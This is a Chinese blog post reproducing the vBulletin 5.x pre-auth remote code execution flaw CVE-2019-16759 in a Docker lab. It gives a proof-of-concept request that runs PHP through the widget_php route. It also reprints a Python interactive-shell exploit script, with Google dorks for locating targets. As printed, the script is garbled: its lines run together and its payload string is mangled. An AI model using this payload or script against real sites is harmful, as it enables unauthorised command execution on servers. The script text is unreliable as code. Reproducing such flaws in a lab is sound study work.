vBulletin 5.x RCE(CVE-2019-16759 )复现

admin 2020年8月13日13:57:29评论440 views字数 995阅读3分19秒阅读模式

环境搭建


使用docker安装


docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-2015-7808

vBulletin 5.x RCE(CVE-2019-16759 )复现


ocker exec -it e4fce6b1886c /bin/bash

vBulletin 5.x RCE(CVE-2019-16759 )复现

update然后装vim
apt-get update
apt install vim
# 改配置
vim /etc/apache2/apache2.conf# 最下面补这个配置
ServerName localhost:80
# 给根目录下run.sh权限并启动chmod +x
./run.sh


vBulletin 5.x RCE(CVE-2019-16759 )复现


漏洞复现

http://YOUR-IP/?routestring=ajax%2Frender%2Fwidget_php&widgetConfig[code]=phpinfo();exit;

vBulletin 5.x RCE(CVE-2019-16759 )复现

漏洞POC参考:

https://seclists.org/fulldisclosure/2019/Sep/31

#!/usr/bin/python## vBulletin 5.x 0day pre-auth RCE exploit# # This should work on all versions from 5.0.0 till 5.5.4## Google Dorks:# - site:*.vbulletin.net# - "Powered by vBulletin Version 5.5.4"import requestsimport sysif len(sys.argv) != 2:    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])params = {"routestring":"ajax/render/widget_php"}while True:    try:        cmd = raw_input("vBulletin$")        params["widgetConfig"] = "echo shell_exec('cmd+'); exit;"        r = requests.post(url = sys.argv[1], data = params)        if r.status_code == 200:            print r.text        else:            sys.exit("Exploit failed! :(")    except KeyboardInterrupt:        sys.exit("nClosing shell...")    except Exception, e:        sys.exit(str(e))

vBulletin 5.x RCE(CVE-2019-16759 )复现


  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年8月13日13:57:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vBulletin 5.x RCE(CVE-2019-16759 )复现https://cn-sec.com/archives/87877.html

发表评论

匿名网友 填写信息